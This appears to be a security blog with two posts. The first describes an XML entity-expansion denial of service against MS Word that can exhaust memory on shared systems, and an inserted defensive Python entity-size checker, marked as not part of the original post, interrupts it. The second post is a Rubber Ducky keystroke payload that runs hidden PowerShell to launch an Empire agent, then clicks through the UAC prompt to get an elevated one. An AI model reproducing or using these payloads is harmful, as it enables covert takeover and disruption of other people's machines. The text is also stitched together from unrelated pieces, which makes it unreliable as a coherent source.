How to create a DoS condition with MS Word

In this post, I’ll show you how to create an application DoS with MS Word.

Just copy/paste the following XML payload into a Word document if you want to test it (save all your work before doing it :))

XML Entity Expansion payload

MS Word parses and tries to resolve all of these entities, which in some circumstances exhausts the system's committed memory (virtual memory).
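As an added example that is not part of the original post, the following Python is a pre-parse guard of the kind a document-ingestion pipeline can apply before handing XML to a full parser: it sizes the fully expanded text of every entity declared in the internal DTD subset without ever expanding it, and rejects the document when resolving the body's references would exceed a byte budget. The sample XML, the regular expressions and the function names are constructed for illustration; references to undeclared or predefined entities such as `&amp;` are counted at their literal length.

```python
import math
import re
# Constructed sample (not the post's payload): nested entities in the shape of an
# expansion document, but totalling only 27 bytes when resolved.
SAMPLE_XML = """<?xml version="1.0"?>
<!DOCTYPE w:document [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;">
]>
<w:document><w:t>&lol2;</w:t></w:document>"""

_DOCTYPE = re.compile(r"<!DOCTYPE[^\[>]*\[(.*?)\]\s*>", re.S)
_ENTITY_DECL = re.compile(r"<!ENTITY\s+(\w+)\s+([\"'])(.*?)\2\s*>", re.S)
_ENTITY_REF = re.compile(r"&(\w+);")

def internal_entities(xml_text: str) -> dict[str, str]:
    """Map general-entity name -> replacement text declared in the internal DTD subset."""
    m = _DOCTYPE.search(xml_text)
    return {n: v for n, _q, v in _ENTITY_DECL.findall(m.group(1))} if m else {}

def expanded_sizes(entities: dict[str, str]) -> dict[str, float]:
    """Expanded byte length of each entity via memoised recursion; a reference cycle gives inf."""
    sizes: dict[str, float] = {}
    active: set[str] = set()

    def size_of(name: str) -> float:
        if name in sizes:
            return sizes[name]
        if name in active:                      # entity (indirectly) refers to itself
            return math.inf
        active.add(name)
        body, total, last = entities[name], 0.0, 0
        for ref in _ENTITY_REF.finditer(body):
            total += len(body[last:ref.start()].encode())
            total += size_of(ref.group(1)) if ref.group(1) in entities else len(ref.group(0))
            last = ref.end()
        total += len(body[last:].encode())
        active.discard(name)
        sizes[name] = total
        return total
    for name in entities:
        size_of(name)
    return sizes

def is_expansion_bomb(xml_text: str, max_bytes: int = 1_000_000) -> bool:
    """Reject before parsing if resolving every reference in the body would exceed max_bytes."""
    sizes = expanded_sizes(internal_entities(xml_text))
    body = xml_text.split("]>", 1)[-1]          # document content after the internal subset
    return sum(sizes.get(r.group(1), 0) for r in _ENTITY_REF.finditer(body)) > max_bytes
```

Because the sizing is linear in the number of declarations, a document that would inflate to gigabytes is rejected in microseconds, which is exactly the check the parser described above lacks.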

In restricted desktops and multi-user environments limited to Microsoft Office, an attacker with basic user capabilities can cause a denial-of-service condition by pasting the XML payload into a Word document, and thereby impact other users working in the same environment.

I asked Microsoft to fix this issue, but since there is no further exploitability (no out-of-band XXE), they replied that they will not fix it.

Just another “Microsoft bug” (or feature) 😉

Launch an Empire stager with Admin privileges

A Ducky payload that attempts to spawn an Empire agent directly with Admin privileges. Tested on Windows 7 & 10; it should work fine even on slow PCs.

Generate the PowerShell callback code with the Empire Framework. Switch Base64 to “False” to decrease execution time.

DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
REM Launching a powershell empire agent in user's context
STRING powershell -W Hidden -nop -noni -c "Powershell Code"
ENTER
DELAY 200
GUI r
DELAY 1000
REM Trying to spawn an Empire agent with elevated privileges
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
STRING powershell -W Hidden -nop -noni -c "Powershell Code"
ENTER
DELAY 500
REM Close all windows in case of privesc attempt failure
ESCAPE